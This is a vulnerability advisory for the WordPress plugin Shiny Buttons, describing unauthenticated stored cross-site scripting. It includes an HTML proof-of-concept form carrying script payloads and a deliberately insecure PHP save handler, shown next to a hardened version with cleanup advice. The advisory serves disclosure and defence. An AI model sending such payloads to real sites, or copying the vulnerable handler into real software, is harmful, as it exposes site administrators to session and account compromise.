WordPress Plugin Vulnerabilities
Shiny Buttons <= 1.1.0 - Unauthenticated Stored Cross-Site Scripting
Description
The plugin does not perform any authorisation or CSRF (nonce) checks when saving a template (the wpbtn_save_template function, hooked to the init action), nor does it sanitise the submitted values or escape them before outputting them in the admin dashboard. Any unauthenticated visitor can therefore add a template containing arbitrary HTML, which leads to Stored Cross-Site Scripting: the payload is written to the database and executes in the browser of an administrator who later views the plugin's dashboard. Because the handler runs on init, the POST can be sent to any URL of the site (the PoC below uses the home page).
Proof of Concept
<html>
  <body>
    <!-- Submitted without any session; the handler runs on init, so any URL of the target site works. -->
    <!-- The id and name fields carry the XSS payloads; the remaining fields are ordinary template values. -->
    <form action="https://example.com/" method="POST">
      <input type="hidden" name="wpbtn_tpl[id]" value="<script>alert(/XSS-id/)</script>" />
      <input type="hidden" name="wpbtn_tpl[name]" value="<script>alert(/XSS-name/)</script>" />
      <input type="hidden" name="wpbtn_tpl[bg_css]" value="background: #6d0019;background: -moz-linear-gradient(top, #6d0019 0%, #a90329 74%);background: -webkit-gradient(linear, left top, left bottom, color-stop(0%,#6d0019), color-stop(74%,#a90329));background: -webkit-linear-gradient(top, #6d0019 0%,#a90329 74%);background: -o-linear-gradient(top, #6d0019 0%,#a90329 74%);background: -ms-linear-gradient(top, #6d0019 0%,#a90329 74%);filter: progid:DXImageTransform.Microsoft.gradient( startColorstr='#6d0019', endColorstr='#a90329',GradientType=0 );background: linear-gradient(top, #6d0019 0%,#a90329 74%);" />
      <input type="hidden" name="wpbtn_tpl[text_color]" value="ffffff" />
      <input type="hidden" name="wpbtn_tpl[font]" value="Michroma" />
      <input type="hidden" name="wpbtn_tpl[font_size]" value="12" />
      <input type="hidden" name="wpbtn_tpl[font_weight]" value="normal" />
      <input type="hidden" name="wpbtn_tpl[border_color]" value="ffffff" />
      <input type="hidden" name="wpbtn_tpl[radius]" value="0" />
      <input type="hidden" name="wpbtn_tpl[width]" value="0" />
      <input type="hidden" name="do" value="Save Changes" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
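To make the three missing controls concrete, the following is an illustrative reconstruction written for this page, not the Shiny Buttons plugin's own code: a save handler with the weaknesses the description names (hooked to init, no capability check, no nonce, no sanitisation, unescaped output) beside a hardened version. The field names and the `do` parameter are taken from the PoC above; the option name `wpbtn_templates`, the helper names, the admin page slug and the `manage_options` capability are assumptions.

```php
<?php
// Illustrative reconstruction of the pattern the advisory describes, written for
// this page; it is NOT the Shiny Buttons plugin's own code. Field names and the
// `do` parameter are taken from the PoC; the option name `wpbtn_templates`, the
// helper names and the admin page slug are assumptions.

// ---- Vulnerable pattern ----------------------------------------------------
// Hooked to `init`, which fires on every request (front end included), with no
// capability check, no nonce and no sanitisation of the posted array.
function wpbtn_save_template_vulnerable() {
    if ( ! isset( $_POST['do'], $_POST['wpbtn_tpl'] ) || 'Save Changes' !== $_POST['do'] ) {
        return;
    }
    $tpl                     = (array) $_POST['wpbtn_tpl']; // attacker-controlled, stored verbatim
    $templates               = get_option( 'wpbtn_templates', array() );
    $templates[ $tpl['id'] ] = $tpl;
    update_option( 'wpbtn_templates', $templates );
}
add_action( 'init', 'wpbtn_save_template_vulnerable' );

// Dashboard listing that echoes stored values unescaped: the <script> payloads in
// the PoC's id/name fields run in the browser of whichever admin opens the page.
function wpbtn_list_templates_vulnerable() {
    foreach ( get_option( 'wpbtn_templates', array() ) as $tpl ) {
        echo '<tr><td>' . $tpl['id'] . '</td><td>' . $tpl['name'] . '</td></tr>';
    }
}

// ---- Hardened pattern ------------------------------------------------------
// admin_post_{action} fires only for logged-in users, so the front end is no
// longer a sink; inside, check the capability, the nonce, then sanitise by type.
function wpbtn_save_template_hardened() {
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Insufficient permissions', '', array( 'response' => 403 ) );
    }
    check_admin_referer( 'wpbtn_save_template', 'wpbtn_nonce' ); // dies on missing/invalid nonce

    $raw = isset( $_POST['wpbtn_tpl'] ) ? wp_unslash( (array) $_POST['wpbtn_tpl'] ) : array();
    $tpl = array(
        'id'           => absint( $raw['id'] ?? 0 ),
        'name'         => sanitize_text_field( $raw['name'] ?? '' ),
        'bg_css'       => wpbtn_sanitize_css( $raw['bg_css'] ?? '' ),
        'text_color'   => wpbtn_sanitize_hex( $raw['text_color'] ?? '' ),
        'font'         => sanitize_text_field( $raw['font'] ?? '' ),
        'font_size'    => absint( $raw['font_size'] ?? 12 ),
        'font_weight'  => ( 'bold' === ( $raw['font_weight'] ?? '' ) ) ? 'bold' : 'normal',
        'border_color' => wpbtn_sanitize_hex( $raw['border_color'] ?? '' ),
        'radius'       => absint( $raw['radius'] ?? 0 ),
        'width'        => absint( $raw['width'] ?? 0 ),
    );
    if ( 0 === $tpl['id'] ) {
        wp_die( 'Invalid template id', '', array( 'response' => 400 ) );
    }

    $templates               = get_option( 'wpbtn_templates', array() );
    $templates[ $tpl['id'] ] = $tpl;
    update_option( 'wpbtn_templates', $templates );

    wp_safe_redirect( admin_url( 'admin.php?page=wpbtn&saved=1' ) );
    exit;
}
add_action( 'admin_post_wpbtn_save_template', 'wpbtn_save_template_hardened' );

// Colours arrive as six hex digits without '#' (see the PoC); anything else becomes a default.
function wpbtn_sanitize_hex( $value ) {
    return preg_match( '/^[0-9a-fA-F]{6}$/', (string) $value ) ? strtolower( $value ) : 'ffffff';
}

// The CSS fragment is free text by design, so allow-list its shape instead of trusting it:
// no tags, no double quotes, angle brackets or backslashes that could close the style
// attribute, no url()/expression()/javascript: that could load or run code. Single quotes
// stay, since the legacy IE filter in the PoC uses them and esc_attr() encodes them at the sink.
function wpbtn_sanitize_css( $css ) {
    $css = wp_strip_all_tags( (string) $css );
    return preg_match( '/(expression\s*\(|url\s*\(|javascript:|[<>"\\\\])/i', $css ) ? '' : $css;
}

// Escape at the sink, in the context the value lands in (HTML text vs. attribute).
function wpbtn_list_templates_hardened() {
    foreach ( get_option( 'wpbtn_templates', array() ) as $tpl ) {
        echo '<tr><td>' . esc_html( $tpl['id'] ) . '</td><td>' . esc_html( $tpl['name'] ) . '</td>'
           . '<td><span style="' . esc_attr( $tpl['bg_css'] ) . '">preview</span></td></tr>';
    }
}

// The admin form that feeds the hardened handler carries the nonce the handler checks.
function wpbtn_template_form() {
    echo '<form method="post" action="' . esc_url( admin_url( 'admin-post.php' ) ) . '">';
    echo '<input type="hidden" name="action" value="wpbtn_save_template" />';
    wp_nonce_field( 'wpbtn_save_template', 'wpbtn_nonce' );
    echo '<input type="text" name="wpbtn_tpl[name]" /> <input type="submit" name="do" value="Save Changes" /></form>';
}
```

The three checks are independent and each closes a different path: the capability check alone still leaves an administrator open to CSRF, the nonce alone would let any logged-in user (the nonce is per-session) save templates, and escaping at the sink protects against data that was already stored before the fix. That last point matters operationally: updating the plugin does not clean the database, so after patching, review the stored templates for payloads like the ones in the PoC and delete any that an unauthenticated request could have planted.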
Classification
Type: XSS

Miscellaneous
Original Researcher: Vishal Mohan
Submitter: Vishal Mohan
Verified: Yes

Timeline
Publicly Published: 2021-11-15
Added: 2021-11-15
Last Updated: 2022-04-11